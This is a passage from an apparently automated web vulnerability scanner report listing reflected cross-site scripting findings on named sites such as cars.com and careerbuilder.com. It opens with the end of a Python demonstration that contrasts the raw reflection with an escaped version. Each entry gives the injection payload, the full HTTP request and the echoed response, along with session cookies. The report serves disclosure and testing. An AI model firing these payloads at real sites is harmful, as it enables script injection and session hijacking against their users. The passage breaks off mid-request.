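# character inside the attribute value, and the quote still closes the attribute.
REFLECTED = ('<a href="http://tlight2-niqwf.aacehardware.info/tag/'
             'Special+Sales+Bear+bear84964\\"><script>alert(1)</script>ffc48037882/">')

# The decoded REST URL parameter as submitted.
TAG_VALUE = 'Special+Sales+Bear+bear84964"><script>alert(1)</script>ffc48037882'


def render_tag_link(tag_value: str) -> str:
    """Constructed rendering of the same link with the value encoded for a
    double-quoted attribute: the quote becomes &quot; and the angle brackets
    become &lt; / &gt;, so the parser keeps the whole value inside href."""
    return ('<a href="http://tlight2-niqwf.aacehardware.info/tag/'
            + html.escape(tag_value, quote=True) + '/">')


if __name__ == "__main__":
    print("reflected:", start_tags(REFLECTED))
    print("encoded  :", start_tags(render_tag_link(TAG_VALUE)))
```

On the reflected line the parser emits an a tag whose href ends in the stray backslash, followed by a script tag; on the encoded rendering it emits a single a tag whose decoded href contains the full submitted value and no script tag.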

Request

GET /tag/Special+Sales+Bear+bear84964"><script>alert(1)</script>ffc48037882/ HTTP/1.1
Host: tlight2-niqwf.aacehardware.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:31:35 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 8176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">

<html xmlns="http://
...[SNIP]...
<a href="http://tlight2-niqwf.aacehardware.info/tag/Special+Sales+Bear+bear84964\"><script>alert(1)</script>ffc48037882/">
...[SNIP]...

2.202. http://tlight2-niqwf.aacehardware.info/tag/Special+Sales+Bear+bear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tlight2-niqwf.aacehardware.info
Path:   /tag/Special+Sales+Bear+bear/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 9b547</title><script>alert(1)</script>a06a19bd24a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/Special+Sales+Bear+bear9b547</title><script>alert(1)</script>a06a19bd24a/ HTTP/1.1
Host: tlight2-niqwf.aacehardware.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:31:41 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">

<html xmlns="http://
...[SNIP]...
<title>Special Sales Bear Bear9b547</title><script>alert(1)</script>a06a19bd24a - tlight2-niqwf</title>
...[SNIP]...

2.203. http://tlight2-niqwf.aacehardware.info/tag/Special+Sales+Bear+bear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tlight2-niqwf.aacehardware.info
Path:   /tag/Special+Sales+Bear+bear/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8d6e9<script>alert(1)</script>fc28cde05d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/Special+Sales+Bear+bear8d6e9<script>alert(1)</script>fc28cde05d5/ HTTP/1.1
Host: tlight2-niqwf.aacehardware.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:31:38 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">

<html xmlns="http://
...[SNIP]...
<a href="http://tlight2-niqwf.aacehardware.info">Special Sales Bear Bear8d6e9<script>alert(1)</script>fc28cde05d5 Home</a>
...[SNIP]...

2.204. http://tlight2-niqwf.aacehardware.info/tag/Special+Sales+Bear+bear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tlight2-niqwf.aacehardware.info
Path:   /tag/Special+Sales+Bear+bear/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c65c6"><script>alert(1)</script>7d45de7dcc6 was submitted in the REST URL parameter 2. This input was echoed as c65c6\"><script>alert(1)</script>7d45de7dcc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/c65c6"><script>alert(1)</script>7d45de7dcc6/ HTTP/1.1
Host: tlight2-niqwf.aacehardware.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:31:37 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 10925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">

<html xmlns="http://
...[SNIP]...
0" marginwidth="0" marginheight="0" border="0" style="border:0;margin:0;width:728px;height:90px;" src="http://www.google.com/uds/modules/elements/newsshow/iframe.html?rsz=large&amp;format=728x90&amp;q=C65c6\"><script>alert(1)</script>7d45de7dcc6&amp;element=true" scrolling="true" allowtransparency="true">
...[SNIP]...

2.205. http://www.careerbuilder.com/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.careerbuilder.com
Path:   /

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9252"%20a%3db%2073cda56ab20 was submitted in the lr parameter. This input was echoed as c9252" a=b 73cda56ab20 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?lr=cbcb_mhc9252"%20a%3db%2073cda56ab20&sc_cmp2=JS_Nav_Home&ff=21 HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51063
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=f7f36667ce184a8cb9e94fbce6247967-343071309-wm-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6500CE4E9C78743F3D9DE8DB5BEB7FE82A6B7F1F5141E4907F897CC6AB6A78A6DED0A396D7BB9DAA4DC; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:35:09 GMT; path=/; HttpOnly
Set-Cookie: JDP=2; domain=.careerbuilder.com; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR23
Date: Sun, 14 Nov 2010 22:35:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Jobs -
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhc9252" a=b 73cda56ab20" />
...[SNIP]...

2.206. http://www.cars.com/go/advice/Section.jsp [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/advice/Section.jsp

Issue detail

The value of the section request parameter is copied into the HTML document as plain text between tags. The payload e4373<script>alert(1)</script>19d07abf959 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/advice/Section.jsp?channel=advice&section=buye4373<script>alert(1)</script>19d07abf959&aff=herald HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cars_persist=3896579244.20480.0000;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:34:33 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000TXAD0OVgnXknoFrBCQo3CKd:155htecnj; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; Expires=Fri, 13 Nov 2015 22:38:12 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Sun, 05 Dec 2010 22:38:12 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Sun, 14-Nov-2010 23:08:13 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 18783

<H1>Error page exception</H1>
<H4>The server cannot use the error page specified for your application to handle the Original Exception printed below. Please see the Error Page Exception below for a d
...[SNIP]...
</B>/advice/includes/_xSectionIndex_buye4373<script>alert(1)</script>19d07abf959.jsp<BR>
...[SNIP]...

2.207. http://www.cars.com/go/advice/Story.jsp [subject parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cars.com
Path:   /go/advice/Story.jsp

Issue detail

The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6a7"><a%20b%3dc>9b378c5b51d was submitted in the subject parameter. This input was echoed as ec6a7"><a b=c>9b378c5b51d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /go/advice/Story.jsp?section=fuel&subject=fuelListec6a7"><a%20b%3dc>9b378c5b51d&story=mpgClass&aff=herald HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cars_persist=3896579244.20480.0000;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:36:51 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000KN73WiX9cO3xbH7RQEXbIu0:155ki5pp2; Path=/
Set-Cookie: Registration=currentUserId:aABwP7AwONNpb7MVD5uJP7tGFQMgZeQuu0YVAyBl5C67RhUDIGXkLtdt8Lc+fbQm6DmHZY3u3I7AM3B8JpmL6LEjoBbN8YpbVk875IzXHQo=; Expires=Fri, 13 Nov 2015 22:39:00 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Sun, 05 Dec 2010 22:39:00 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Sun, 14-Nov-2010 23:09:01 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 26798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...
</B>/advice/Subjects/fuelListec6a7"><a b=c>9b378c5b51d/mpgClass.jsp<BR>
...[SNIP]...

2.208. http://www.cars.com/go/advice/Story.jsp [subject parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cars.com
Path:   /go/advice/Story.jsp

Issue detail

The value of the subject request parameter is copied into the HTML document as plain text between tags. The payload 1f8c3<a>11eb73411e3 was submitted in the subject parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /go/advice/Story.jsp?section=buy&subject=1f8c3<a>11eb73411e3&story=classResidual HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:29:56 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000Dlbc9PoZOj5pIx10Rmflnsr:155ki65ur; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; Expires=Sat, 14 Nov 2015 00:33:12 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Mon, 06 Dec 2010 00:33:12 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Mon, 15-Nov-2010 01:03:14 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 26721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...
</B>/advice/Subjects/1f8c3<a>11eb73411e3/classResidual.jsp<BR>
...[SNIP]...

2.209. http://www.cars.com/go/car-dealers/ck/Miami-FL/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/car-dealers/ck/Miami-FL/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cbc6"><script>alert(1)</script>db9daeb9116 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/car-dealers/ck/Miami-FL/?8cbc6"><script>alert(1)</script>db9daeb9116=1 HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cars_persist=3896579244.20480.0000;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:35:20 GMT
Server: IBM_HTTP_Server
Content-Length: 27086
Set-Cookie: JSESSIONID=0000nyoUNvNI7Lt10MwO8bd0UA0:155htds4n; Path=/
Set-Cookie: affiliate=national; Expires=Sun, 05 Dec 2010 22:38:59 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Sun, 14-Nov-2010 23:09:00 GMT; path=/
Vary: Accept-Encoding, User-Agent


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


                                                                                                   <!--Story is VCNKDU-->

...[SNIP]...
<a href="http://www.cars.com/go/car-dealers/kc/Acura/Miami-FL/?8cbc6"><script>alert(1)</script>db9daeb9116=1">
...[SNIP]...

2.210. http://www.cars.com/go/crp/buyingGuides/Story.jsp [story parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cars.com
Path:   /go/crp/buyingGuides/Story.jsp

Issue detail

The value of the story request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd9a2"><a%20b%3dc>39b26a2aac5 was submitted in the story parameter. This input was echoed as dd9a2"><a b=c>39b26a2aac5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /go/crp/buyingGuides/Story.jsp?section=Sports&story=sportHot2011dd9a2"><a%20b%3dc>39b26a2aac5&subject=stories&year=New HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:19:59 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000A7uHp_Y5fhiW-XKSPatRJuz:155ki67a3; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; Expires=Sat, 14 Nov 2015 00:23:16 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Mon, 06 Dec 2010 00:23:16 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Mon, 15-Nov-2010 00:53:17 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 26895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...
</B>/crp/buyingGuides/Subjects/New/stories/sportHot2011dd9a2"><a b=c>39b26a2aac5.jsp<BR>
...[SNIP]...

2.211. http://www.cars.com/go/crp/buyingGuides/Story.jsp [subject parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/crp/buyingGuides/Story.jsp

Issue detail

The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177f8"><script>alert(1)</script>c46c53badf5 was submitted in the subject parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/crp/buyingGuides/Story.jsp?section=Sports&story=sportHot2011&subject=stories177f8"><script>alert(1)</script>c46c53badf5&year=New HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:21:10 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000v-tEWlZWJpVj4MgTDvyXkyJ:155htdomo; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; Expires=Sat, 14 Nov 2015 00:23:34 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Mon, 06 Dec 2010 00:23:34 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Mon, 15-Nov-2010 00:53:35 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 27041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...
</B>/crp/buyingGuides/Subjects/New/stories177f8"><script>alert(1)</script>c46c53badf5/sportHot2011.jsp<BR>
...[SNIP]...

2.212. http://www.cars.com/go/dealersearch/specials.jsp [specialsURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/dealersearch/specials.jsp

Issue detail

The value of the specialsURL request parameter is copied into the value of a tag attribute which can contain JavaScript. The payload javascript%3aalert(1)//f5fd4a94 was submitted in the specialsURL parameter. This input was echoed as javascript:alert(1)//f5fd4a94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/dealersearch/specials.jsp?specialsURL=javascript%3aalert(1)//f5fd4a94&apn=herald&aff=herald HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cars_persist=3896579244.20480.0000;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:36:17 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Content-Length: 15273
Set-Cookie: JSESSIONID=0000t9KR-wg3bwtm-ZrPa-f4Uz6:155htecnj; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAwTnSlQzm6gyUo9ep40Ca5T4Hye47Z6DyE=; Expires=Fri, 13 Nov 2015 22:38:41 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Sun, 05 Dec 2010 22:38:41 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Sun, 14-Nov-2010 23:08:42 GMT; path=/
Vary: Accept-Encoding, User-Agent


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Cars.com: Dealer Specials</title>
   <link href="/css/globalBeta.css" type="text/css" rel="stylesheet"
...[SNIP]...
<iframe src="javascript:alert(1)//f5fd4a94" width="580" height="1100" frameborder="0">
...[SNIP]...

2.213. http://www.cars.com/go/includes/targeting/vendors.jsp [makename parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/includes/targeting/vendors.jsp

Issue detail

The value of the makename request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a186d"><script>alert(1)</script>13aeb39e616 was submitted in the makename parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/includes/targeting/vendors.jsp?makename=a186d"><script>alert(1)</script>13aeb39e616&modelname=&year=&my= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.cars.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.cars.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=00006AQWaoFsyLddCkEpMZm_TPv:155ki6a91; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; affiliate=herald; cars_persist=3896579244.20480.0000; cars_persist=3863024812.20480.0000

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:18:49 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=00000EfPi52FUIdHTX1ocavmTd0:155ki6a91; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; Expires=Sat, 14 Nov 2015 00:22:05 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Mon, 06 Dec 2010 00:22:05 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: Keep-Alive
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Mon, 15-Nov-2010 00:52:05 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 1378

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<body>

<iframe src="http://an.tacoda.net/an/slf.htm?siteid=11889&st=&make=a186d&#03
...[SNIP]...
<img src="http://ad.trafficmp.com/a/bpix?top=7-2674.1&make=a186d"><script>alert(1)</script>13aeb39e616&model=&intent=&zip=" />
...[SNIP]...

2.214. http://www.cars.com/go/includes/targeting/vendors.jsp [modelname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/includes/targeting/vendors.jsp

Issue detail

The value of the modelname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b61"><script>alert(1)</script>d4b3fa8bb16 was submitted in the modelname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/includes/targeting/vendors.jsp?makename=&modelname=90b61"><script>alert(1)</script>d4b3fa8bb16&year=&my= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.cars.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
